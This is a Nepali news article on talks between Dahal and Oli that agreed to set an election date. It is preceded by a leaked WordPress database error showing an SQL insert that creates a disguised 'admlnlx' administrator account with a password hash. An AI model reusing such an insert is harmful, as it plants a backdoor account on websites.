WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmPOPd529pDXs8w7vwtrAd9IL/hU3H1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 02:01:11', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ २८ –
प्रधानमन्त्री पुष्पकमल दाहाल र नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीबीच लामो समयपछि वार्ता भएको छ ।
माओवादी केन्द्रका नेता नारायणकाजी श्रेष्ठको निवासमा भएको वार्तामा जेठ १ गते निर्वाचन गर्ने गरी फागुन ८ गतेभित्रै मिति तोक्न दुई शीर्ष नेता सहमत भएका छन् । लामो समयपछिको संवादहीनताको अवस्था तोड्दै भएको द्विपक्षीय छलफलमा निर्वाचनको विषयमा छलफल भएको एमाले उपाध्यक्ष भीम रावलले जानकारी दिए ।
“हामीले सरकारलाई निर्वाचनको मिति तोक्न भन्यौँ, सरकार त्यसमा सकारात्मक देखिएको छ,” उनले बाह्रखरीसँग भने ।
त्यस्तै, उपाध्यक्ष श्रेष्ठका अनुसार चुनावमा नजाने हो भने मुलुक प्रतिगमनको दिशामा अघि बढ्ने हुँदा जसरी पनि जेठमा चुनाव गराउन दुई नेता सहमत भएका छन् ।“जेठ १ गते निर्वाचन गराउन फागुन ८ भित्रै मिति तोक्न दाहाल–ओली सहमत हुनुभएको छन्,” उनले भने, “संविधान संशोधन प्रक्रिया पनि अघि बढाउने, चुनावी प्रक्रिया पनि नरोक्नेबारे दुई पक्षबीच छलफल भयो ।”